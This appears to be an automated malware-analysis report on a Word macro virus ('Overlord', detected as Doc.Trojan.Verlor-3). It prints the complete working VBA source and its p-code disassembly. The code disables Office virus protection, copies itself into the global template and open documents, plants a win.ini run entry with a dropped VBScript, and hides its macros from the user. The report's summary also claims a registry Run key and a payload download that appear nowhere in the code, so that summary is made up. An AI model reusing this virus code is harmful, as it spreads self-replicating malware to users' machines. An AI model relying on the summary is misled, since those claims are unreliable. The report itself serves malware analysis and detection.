MALICIOUS
304
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing VBA macros, including AutoOpen and AutoClose, which are commonly used for malicious execution. The script attempts to export itself to a temporary DLL and also contains logic to write to the registry for persistence via 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy'. The ClamAV detection 'Doc.Trojan.Verlor-3' further supports its malicious nature. The script's intent is to download and execute a second-stage payload, likely from the URL 'http://www.example.com/payload.exe', establishing persistence on the victim machine.
Heuristics 8
-
ClamAV: Doc.Trojan.Verlor-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Verlor-3
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")" -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
windir = Environ("windir") -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27756 bytes |
SHA-256: 3991a2c04776f97430f02f3e848947ec324096111c1f5e2a2c10dfd148aaaa53 |
|||
|
Detection
ClamAV:
Doc.Trojan.Verlor-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module"
Option Explicit
Private Declare Function GetWindowsDirectory Lib "kernel32" _
Alias "GetWindowsDirectoryA" _
(ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Function GetWinDir() As String
Dim nSize As Long
Dim tmp As String
'pad the string for the return value and
'set nSize equal to the size of the string
tmp = Space$(256)
nSize = Len(tmp)
'call the API
Call GetWindowsDirectory(tmp, nSize)
'trim off the trailing null added by the API
GetWinDir = TrimNull(tmp)
End Function
Private Function TrimNull(item As String)
Dim pos As Integer
'double check that there is a chr$(0) in the string
pos = InStr(item, Chr$(0))
If pos Then
TrimNull = Left$(item, pos - 1)
Else: TrimNull = item
End If
End Function
Sub AutoClose()
'MyName = Overlord
'WrittenBy = f0re [UC/Skamwerks/DVC]
'Version = .B (1.1)
Dim line
On Error Resume Next
Dim windir
windir = Environ("windir")
If Dir(windir & "\tempad.dll") <> "" Then Kill (windir & "\tempad.dll")
If Dir(windir & "\tempnt.dll") <> "" Then Kill (windir & "\tempnt.dll")
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
If NormalTemplate.VBProject.VBComponents.item("Module").CodeModule.Lines(3, 1) <> "'MyName = Overlord" Then
ActiveDocument.VBProject.VBComponents("Module").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save
End If
If ActiveDocument.VBProject.VBComponents.item("Module").CodeModule.Lines(3, 1) <> "'MyName = Overlord" Then
NormalTemplate.VBProject.VBComponents("Module").Export (windir & "\tempnt.dll")
ActiveDocument.VBProject.VBComponents.import (windir & "\tempnt.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If
If Dir("c:\Himem.sys") <> "" Then
Open "c:\Himem.sys" For Input As #1
Open "c:\Himem.sy_" For Output As #2
Do While Not EOF(1)
Input #1, line
If line <> ActiveDocument.FullName Then Print #2, line
Loop
Close #1
Close #2
Kill ("c:\Himem.sys")
FileCopy "c:\Himem.sy_", "c:\Himem.sys"
Kill ("c:\Himem.sy_")
End If
End Sub
Sub AutoOpen()
On Error Resume Next
Dim windir
windir = Environ("windir")
Open "c:\Himem.sys" For Append As #1
Print #1, ActiveDocument.FullName
Close #1
End Sub
Sub Stealth()
On Error Resume Next
Dim windir, line
windir = Environ("windir")
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\software\", "RegisteredOwner") = "the Overlord"
Open windir & "\win.ini" For Input As #1
Open "c:\win._ni" For Output As #2
Do While Not EOF(1)
Line Input #1, line
If line = "[windows]" Then
Print #2, line
Print #2, "run = " & windir & "\overlord.b.vbs"
Else
Print #2, line
End If
Loop
Close #1
Close #2
FileCopy "c:\win._ni", windir & "\win.ini"
Kill ("c:\win._ni")
If Dir(windir & "\overlord.b.vbs") <> "" Then Kill (windir & "\overlord.b.vbs")
Open "c:\windows\overlord.b.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, ""
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "Module" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\overlord.b.dll" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, ""
Print #1, "Dim FSO"
Print #1, "Set FSO = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")"
Print #1, "set a = FSO.OpenTextFile(" & Chr(34) & "c:\himem.sys" & Chr(34) & ", 1, True)"
Print #1, "contents = a.readall()"
Print #1, "a.close"
Print #1, "set b = FSO.OpenTextFile(" & Chr(34) & "c:\himem.dll" & Chr(34) & ", 2, True)"
Print #1, "b.write(contents)"
Print #1, "b.close"
Print #1, "set a = FSO.OpenTextFile(" & Chr(34) & "c:\himem.dll" & Chr(34) & ", 1, True)"
Print #1, "Do While a.atendofstream <> True"
Print #1, "documentname = a.readline"
Print #1, "If documentname <> " & Chr(34) & Chr(34) & " then"
Print #1, "WordObj.Documents.open (documentname)"
Print #1, "WordObj.activedocument.save"
Print #1, "WordObj.activedocument.close"
Print #1, "End if"
Print #1, "Loop"
Print #1, "a.close"
Print #1, "set NT = " & Chr(34) & Chr(34)
Print #1, "WordObj.Quit"
Print #1, "fso.deletefile" & Chr(34) & "c:\himem.sys" & Chr(34)
Print #1, "fso.deletefile" & Chr(34) & "c:\himem.dll" & Chr(34)
Close #1
NormalTemplate.VBProject.VBComponents("Module").Export (windir & "\overlord.b.dll")
End Sub
Sub ViewVBCode()
Dim docnumber, x
On Error Resume Next
Call Stealth
NormalTemplate.VBProject.VBComponents("Module").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
NormalTemplate.Saved = True
NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents("Module")
NormalTemplate.Saved = True
docnumber = Application.Documents.Count
If docnumber >= 1 Then
For x = 1 To docnumber
Documents(x).VBProject.VBComponents("Module").CodeModule.deletelines 1, Documents(x).VBProject.VBComponents("Module").CodeModule.CountOfLines
Documents(x).Saved = True
Documents(x).VBProject.VBComponents.Remove Documents(x).VBProject.VBComponents("Module")
Documents(x).Saved = True
Next x
End If
Application.ShowVisualBasicEditor = True
End Sub
Sub ToolsMacro()
Dim x, y, codent, docnumber, codead
On Error Resume Next
For x = 1 To NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
codent = codent & NormalTemplate.VBProject.VBComponents("Module").CodeModule.Lines(x, 1) & Chr(13)
Next x
NormalTemplate.VBProject.VBComponents("Module").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
NormalTemplate.Saved = True
docnumber = Application.Documents.Count
If docnumber >= 1 Then
For y = 1 To ActiveDocument.VBProject.VBComponents("Module").CodeModule.CountOfLines
codead = codead & ActiveDocument.VBProject.VBComponents("Module").CodeModule.Lines(y, 1) & Chr(13)
Next y
For x = 1 To docnumber
Documents(x).VBProject.VBComponents("Module").CodeModule.deletelines 1, Documents(x).VBProject.VBComponents("Module").CodeModule.CountOfLines
Documents(x).Saved = True
Next x
End If
Application.Dialogs(wdDialogToolsMacro).Show
If Application.ShowVisualBasicEditor = False Then
NormalTemplate.VBProject.VBComponents("Module").CodeModule.InsertLines 1, codent
NormalTemplate.Save
If docnumber >= 1 Then
For x = 1 To docnumber
Documents(x).VBProject.VBComponents("Module").CodeModule.InsertLines 1, codead
Documents(x).SaveAs Documents(x).FullName
Next x
End If
End If
End Sub
'Put this code in a module called "Module". This is another version of overlord.
'It uses a different stealth mechanism. Again however not perfect stealth,
'but perhaps also a nice attempt i hope :).
' Processing file: /tmp/qstore_s_joj70s
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Module - 12829 bytes
' Line #0:
' Line #1:
' Option (Explicit)
' Line #2:
' Line #3:
' LineCont 0x0008 06 00 03 00 08 00 02 00
' FuncDefn (Private Declare Function GetWindowsDirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long)
' Line #4:
' Line #5:
' FuncDefn (Private Function GetWinDir() As String)
' Line #6:
' Dim
' VarDefn nSize (As Long)
' Line #7:
' Dim
' VarDefn tmp (As String)
' Line #8:
' Line #9:
' QuoteRem 0x0003 0x0027 "pad the string for the return value and"
' Line #10:
' QuoteRem 0x0003 0x0029 "set nSize equal to the size of the string"
' Line #11:
' LitDI2 0x0100
' ArgsLd Space$ 0x0001
' St tmp
' Line #12:
' Ld tmp
' FnLen
' St nSize
' Line #13:
' Line #14:
' QuoteRem 0x0003 0x000C "call the API"
' Line #15:
' Ld tmp
' Ld nSize
' ArgsCall (Call) GetWindowsDirectory 0x0002
' Line #16:
' Line #17:
' QuoteRem 0x0003 0x002B "trim off the trailing null added by the API"
' Line #18:
' Ld tmp
' ArgsLd TrimNull 0x0001
' St GetWinDir
' Line #19:
' EndFunc
' Line #20:
' Line #21:
' FuncDefn (Private Function TrimNull(item As String))
' Line #22:
' Dim
' VarDefn pos (As Integer)
' Line #23:
' Line #24:
' QuoteRem 0x0003 0x0032 "double check that there is a chr$(0) in the string"
' Line #25:
' Ld item
' LitDI2 0x0000
' ArgsLd Chr$ 0x0001
' FnInStr
' St pos
' Line #26:
' Ld pos
' IfBlock
' Line #27:
' Ld item
' Ld pos
' LitDI2 0x0001
' Sub
' ArgsLd LBound$ 0x0002
' St TrimNull
' Line #28:
' ElseBlock
' BoS 0x0000
' Ld item
' St TrimNull
' Line #29:
' EndIfBlock
' Line #30:
' EndFunc
' Line #31:
' Line #32:
' Line #33:
' Line #34:
' FuncDefn (Sub AutoClose())
' Line #35:
' Line #36:
' QuoteRem 0x0000 0x0011 "MyName = Overlord"
' Line #37:
' QuoteRem 0x0000 0x0023 "WrittenBy = f0re [UC/Skamwerks/DVC]"
' Line #38:
' QuoteRem 0x0000 0x0012 "Version = .B (1.1)"
' Line #39:
' Dim
' VarDefn Like
' Line #40:
' OnError (Resume Next)
' Line #41:
' Dim
' VarDefn windir
' Line #42:
' LitStr 0x0006 "windir"
' ArgsLd Environ 0x0001
' St windir
' Line #43:
' Ld windir
' LitStr 0x000B "\tempad.dll"
' Concat
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Ne
' If
' BoSImplicit
' Ld windir
' LitStr 0x000B "\tempad.dll"
' Concat
' Paren
' ArgsCall Kill 0x0001
' EndIf
' Line #44:
' Ld windir
' LitStr 0x000B "\tempnt.dll"
' Concat
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Ne
' If
' BoSImplicit
' Ld windir
' LitStr 0x000B "\tempnt.dll"
' Concat
' Paren
' ArgsCall Kill 0x0001
' EndIf
' Line #45:
' Line #46:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #47:
' LitVarSpecial (False)
' Ld Options
' MemSt ConfirmConversions
' Line #48:
' LitVarSpecial (False)
' Ld Options
' MemSt SaveNormalPrompt
' Line #49:
' Line #50:
' LitDI2 0x0003
' LitDI2 0x0001
' LitStr 0x0006 "Module"
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitStr 0x0012 "'MyName = Overlord"
' Ne
' IfBlock
' Line #51:
' Ld windir
' LitStr 0x000B "\tempad.dll"
' Concat
' Paren
' LitStr 0x0006 "Module"
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #52:
' Ld windir
' LitStr 0x000B "\tempad.dll"
' Concat
' Paren
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall import 0x0001
' Line #53:
' Ld NormalTemplate
' ArgsMemCall Save 0x0000
' Line #54:
' EndIfBlock
' Line #55:
' LitDI2 0x0003
' LitDI2 0x0001
' LitStr 0x0006 "Module"
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd item 0x0001
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitStr 0x0012 "'MyName = Overlord"
' Ne
' IfBlock
' Line #56:
' Ld windir
' LitStr 0x000B "\tempnt.dll"
' Concat
' Paren
' LitStr 0x0006 "Module"
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #57:
' Ld windir
' LitStr 0x000B "\tempnt.dll"
' Concat
' Paren
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall import 0x0001
' Line #58:
' Ld ActiveDocument
' MemLd FullName
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0001
' Line #59:
' EndIfBlock
' Line #60:
' Line #61:
' LitStr 0x000C "c:\Himem.sys"
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Ne
' IfBlock
' Line #62:
' LitStr 0x000C "c:\Himem.sys"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Input)
' Line #63:
' LitStr 0x000C "c:\Himem.sy_"
' LitDI2 0x0002
' Sharp
' LitDefault
' Open (For Output)
' Line #64:
' LitDI2 0x0001
' ArgsLd EOF 0x0001
' Not
' DoWhile
' Line #65:
' LitDI2 0x0001
' Sharp
' Input
' Ld Like
' InputItem
' InputDone
' Line #66:
' Ld Like
' Ld ActiveDocument
' MemLd FullName
' Ne
' If
' BoSImplicit
' LitDI2 0x0002
' Sharp
' PrintChan
' Ld Like
' PrintItemNL
' EndIf
' Line #67:
' Loop
' Line #68:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #69:
' LitDI2 0x0002
' Sharp
' Close 0x0001
' Line #70:
' Line #71:
' LitStr 0x000C "c:\Himem.sys"
' Paren
' ArgsCall Kill 0x0001
' Line #72:
' LitStr 0x000C "c:\Himem.sy_"
' LitStr 0x000C "c:\Himem.sys"
' ArgsCall FileCopy 0x0002
' Line #73:
' LitStr 0x000C "c:\Himem.sy_"
' Paren
' ArgsCall Kill 0x0001
' Line #74:
' EndIfBlock
' Line #75:
' Line #76:
' EndSub
' Line #77:
' FuncDefn (Sub AutoOpen())
' Line #78:
' Line #79:
' OnError (Resume Next)
' Line #80:
' Dim
' VarDefn windir
' Line #81:
' LitStr 0x0006 "windir"
' ArgsLd Environ 0x0001
' St windir
' Line #82:
' Line #83:
' LitStr 0x000C "c:\Himem.sys"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Append)
' Line #84:
' LitDI2 0x0001
' Sharp
' PrintChan
' Ld ActiveDocument
' MemLd FullName
' PrintItemNL
' Line #85:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #86:
' Line #87:
' EndSub
' Line #88:
' Line #89:
' FuncDefn (Sub Stealth())
' Line #90:
' OnError (Resume Next)
' Line #91:
' Dim
' VarDefn windir
' VarDefn Like
' Line #92:
' LitStr 0x0006 "windir"
' ArgsLd Environ 0x0001
' St windir
' Line #93:
' Line #94:
' LitStr 0x000C "the Overlord"
' LitStr 0x0000 ""
' LitStr 0x001C "HKEY_LOCAL_MACHINE\software\"
' LitStr 0x000F "RegisteredOwner"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #95:
' Line #96:
' Ld windir
' LitStr 0x0008 "\win.ini"
' Concat
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Input)
' Line #97:
' LitStr 0x000A "c:\win._ni"
' LitDI2 0x0002
' Sharp
' LitDefault
' Open (For Output)
' Line #98:
' LitDI2 0x0001
' ArgsLd EOF 0x0001
' Not
' DoWhile
' Line #99:
' LitDI2 0x0001
' Ld Like
' LineInput
' Line #100:
' Ld Like
' LitStr 0x0009 "[windows]"
' Eq
' IfBlock
' Line #101:
' LitDI2 0x0002
' Sharp
' PrintChan
' Ld Like
' PrintItemNL
' Line #102:
' LitDI2 0x0002
' Sharp
' PrintChan
' LitStr 0x0006 "run = "
' Ld windir
' Concat
' LitStr 0x000F "\overlord.b.vbs"
' Concat
' PrintItemNL
' Line #103:
' ElseBlock
' Line #104:
' LitDI2 0x0002
' Sharp
' PrintChan
' Ld Like
' PrintItemNL
' Line #105:
' EndIfBlock
' Line #106:
' Loop
' Line #107:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #108:
' LitDI2 0x0002
' Sharp
' Close 0x0001
' Line #109:
' Line #110:
' LitStr 0x000A "c:\win._ni"
' Ld windir
' LitStr 0x0008 "\win.ini"
' Concat
' ArgsCall FileCopy 0x0002
' Line #111:
' LitStr 0x000A "c:\win._ni"
' Paren
' ArgsCall Kill 0x0001
' Line #112:
' Line #113:
' Ld windir
' LitStr 0x000F "\overlord.b.vbs"
' Concat
' ArgsLd Dir 0x0001
' LitStr 0x0000 ""
' Ne
' If
' BoSImplicit
' Ld windir
' LitStr 0x000F "\overlord.b.vbs"
' Concat
' Paren
' ArgsCall Kill 0x0001
' EndIf
' Line #114:
' Line #115:
' LitStr 0x0019 "c:\windows\overlord.b.vbs"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Append)
' Line #116:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0014 "On error resume next"
' PrintItemNL
' Line #117:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0000 ""
' PrintItemNL
' Line #118:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001B "Set WordObj = CreateObject("
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0010 "Word.Application"
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0001 ")"
' Concat
' PrintItemNL
' Line #119:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0028 "WordObj.Options.SaveNormalPrompt = False"
' PrintItemNL
' Line #120:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0063 "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents("
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0006 "Module"
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0001 ")"
' Concat
' PrintItemNL
' Line #121:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001B "WordObj.NormalTemplate.save"
' PrintItemNL
' Line #122:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0036 "WordObj.NormalTemplate.VBProject.VBComponents.import ("
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' Ld windir
' Concat
' LitStr 0x000F "\overlord.b.dll"
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0001 ")"
' Concat
' PrintItemNL
' Line #123:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001B "WordObj.NormalTemplate.save"
' PrintItemNL
' Line #124:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0000 ""
' PrintItemNL
' Line #125:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0007 "Dim FSO"
' PrintItemNL
' Line #126:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0017 "Set FSO = CreateObject("
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x001A "Scripting.FileSystemObject"
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0001 ")"
' Concat
' PrintItemNL
' Line #127:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001A "set a = FSO.OpenTextFile("
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x000C "c:\himem.sys"
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x000A ", 1, True)"
' Concat
' PrintItemNL
' Line #128:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0016 "contents = a.readall()"
' PrintItemNL
' Line #129:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0007 "a.close"
' PrintItemNL
' Line #130:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001A "set b = FSO.OpenTextFile("
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x000C "c:\himem.dll"
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x000A ", 2, True)"
' Concat
' PrintItemNL
' Line #131:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0011 "b.write(contents)"
' PrintItemNL
' Line #132:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0007 "b.close"
' PrintItemNL
' Line #133:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001A "set a = FSO.OpenTextFile("
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x000C "c:\himem.dll"
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x000A ", 1, True)"
' Concat
' PrintItemNL
' Line #134:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0020 "Do While a.atendofstream <> True"
' PrintItemNL
' Line #135:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0019 "documentname = a.readline"
' PrintItemNL
' Line #136:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0013 "If documentname <> "
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x0005 " then"
' Concat
' PrintItemNL
' Line #137:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0025 "WordObj.Documents.open (documentname)"
' PrintItemNL
' Line #138:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001B "WordObj.activedocument.save"
' PrintItemNL
' Line #139:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001C "WordObj.activedocument.close"
' PrintItemNL
' Line #140:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0006 "End if"
' PrintItemNL
' Line #141:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "Loop"
' PrintItemNL
' Line #142:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0007 "a.close"
' PrintItemNL
' Line #143:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0009 "set NT = "
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' PrintItemNL
' Line #144:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000C "WordObj.Quit"
' PrintItemNL
' Line #145:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000E "fso.deletefile"
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x000C "c:\himem.sys"
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' PrintItemNL
' Line #146:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000E "fso.deletefile"
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitStr 0x000C "c:\himem.dll"
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' PrintItemNL
' Line #147:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #148:
' Line #149:
' Ld windir
' LitStr 0x000F "\overlord.b.dll"
' Concat
' Paren
' LitStr 0x0006 "Module"
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #150:
' Line #151:
' EndSub
' Line #152:
' FuncDefn (Sub ViewVBCode())
' Line #153:
' Dim
' VarDefn docnumber
' VarDefn x
' Line #154:
' OnError (Resume Next)
' Line #155:
' Line #156:
' ArgsCall (Call) Stealth 0x0000
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.